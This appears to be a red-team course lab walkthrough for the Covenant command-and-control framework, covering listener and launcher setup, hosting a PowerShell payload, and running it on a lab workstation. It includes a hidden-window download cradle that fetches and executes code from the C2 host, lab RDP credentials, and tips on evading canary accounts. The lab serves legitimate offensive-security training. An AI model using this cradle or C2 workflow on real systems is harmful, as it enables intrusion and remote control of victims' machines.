Skip to content

Lab 2.6 : Bonus! Covenant Framework

Objectives

  • Review the features of Covenant
  • Create a listener
  • Create a launcher and host it on the C2 server
  • Execute the launcher payload in the target environment
  • Interact with the Grunt
  • Explore Covenant modules

This lab will introduce another open-source command and control framework that is written in C#. The covenant framework acts similiarly to Empire. Covenant was a project started by Ryan Cobb (@cobber_io) while he was exploring .NET tradecraft. Some of the terminology is a slightly different but the concepts are the same. You'll notice there is not support for a Linux grunt.

TTPs Emulated in this Lab

Preparation

Preparation Steps

Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.

Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:

sudo openvpn ~/Desktop/sec565-labs-range.ovpn

Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :

ping -c 4 draconem.io

If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.

curl draconem.io | head

On Your Own

  1. Create a covenant listener
  2. Create a launcher payload
  3. Execute the launcher to create a grunt in the target environment via RDP: xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
  4. Ensure communication works properly
  5. Review the walkthrough

Walkthrough

Warning

Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.

Launch Covenant

1. Open a Terminal and start Covenant

cd /opt/covenant
sudo ./covenant-bootstrap.sh

2. Open a browser to https://127.0.0.1:7443/ to bring up the Covenant web interface. Unlike Empire, Covenant comes with web interface by default and does not have a CLI option, but it does have an API. Accept the risk of the self signed certificate.

3. Register a new user and set a password.

4. On the first dashboard you see a listing of Grunts, Listeners, and Taskings. Grunts are the Covenant version of agents in Empire.

Create Listener

5. Let's create our first Covenant listener. Click on Listeners in the left side navigation pane. Then click on + Create. For the purposes of this lab we will not use SSL and we will not use a redirector.

Provide the following values:

  • Name: interactive-http
  • BindAddress: 0.0.0.0
  • BindPort: 8080
  • ConnectPort: 8080
  • ConnectAddresses: 10.254.252.2 <- This must be the ip address of your tun0 adapter
  • UseSSL: False
  • HttpProfile: DefaultHttpProfile

Click the + Create button at the bottom of the screen.

Create Launcher

6. Click on Launchers in the left side navigation pane. You'll notice there 10 or more different launchers. Each has a description of how code will get executed and what utilities it will use. Unfortunately half of the launchers may not work on Windows 10+ and Windows Server 2016+. Click on PowerShell and then provide the following values:

  • Listener: interactive-http
  • ImplantTemplate: GruntHTTP
  • DotNetVersion: Net35
  • ValidateCert: True
  • UseCertPinning: True
  • Delay: 5
  • JitterPercentage: 10
  • ConnectAttempts: 5000
  • KillDate: Leave default
  • ParameterString: Leave default

Leave the rest as defaults and click the Generate button. When you click Generate you'll see the Launcher field populate with a long PowerShell line.

Host Launcher

7. Click on the Host tab and set a path that the file can be retrieved from. Enter /audit.ps1 in the Url field and click the Host button. You'll notice the Launcher field will update after hosting the file.

Warning

For the purpose of this lab we are going to communicate directly with the target system, including the hosting of the launcher. This is poor opsec for a real engagement! You would want to route C2 communications through a redirector and also host the launcher on a completely different VPS. Keeping separation between these functions creates a more resilient attack infrastructure.

Retrieve Launcher

8. RDP to the target workstation, student, using the credentials student : Sec565!!. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin.

xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp

We have two options, we could download the file we hosted, saving it to disk, and then execute it, or better yet, download and execute directly without touching disk. The Launcher field gives us a "download cradle". This PowerShell will create a new Net.WebClient object that will make a web request and then execute the response from the web server.

!!! Warning

    Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://10.254.252.2:8080/audit.ps1')"

Open a command prompt by clicking the windows icon in the lower left and typing cmd.exe. Then paste the download cradle and press Enter. The window should disappear and a new grunt should check in and register on the C2.

Grunt Interaction

9. Click on Grunts in the left side navigation pane. Then click on the name of the new grunt. You should see metadata about the grunt.

10. Click on the Interact tab to create tasks. Let's execute a pwd and then a ScreenShot.

11. Click on the Task tab to see a drop down menu and fields for using some of the built in modules. Select GetDomainUser in the drop down list and then provide the username Samantha.Swenson in the identities field. Click the Task button to issue the task. In the Interact tab you'll see the response from the grunt. From this information, you learned that this user account is part of the Finance OU and also the lastlogon is 1/1/0001 12:00:00 AM. If this were a real environment, this would stand out as a canary account and one to avoid. A canary account is one that is not tied to a real user but more of a deceptive trap. If that account were to log in then an alert would trigger, and the Blue Team would be aware that something nefarious is happening.

12. The Taskings tab will list all the tasks the grunt was assigned along with status and the C2 user that created the task.

Tracking Indicators

13. Click on Data in the left side navigation pane. Then click on Indicators to see all tracked indicators that the Red Team should be aware of, and the Blue Team could detect. Target Indicators will list all targets that have been exploited. Network Indicators will list ip addresses and URIs that network forensics could uncover. Lastly, File Indicators will keep track of files that have been downloaded to the target. Even if these don't touch the disk, they could be carved out of a network capture depending on the circumstances of the transfer.

Conclusion

In this lab we explored a new open-source command and control framework. We created a listener and a PowerShell launcher. We RDP'd directly into the environment and used a download cradle to retrieve and execute our launcher. We explored a few of the tasks/modules that the framework provides.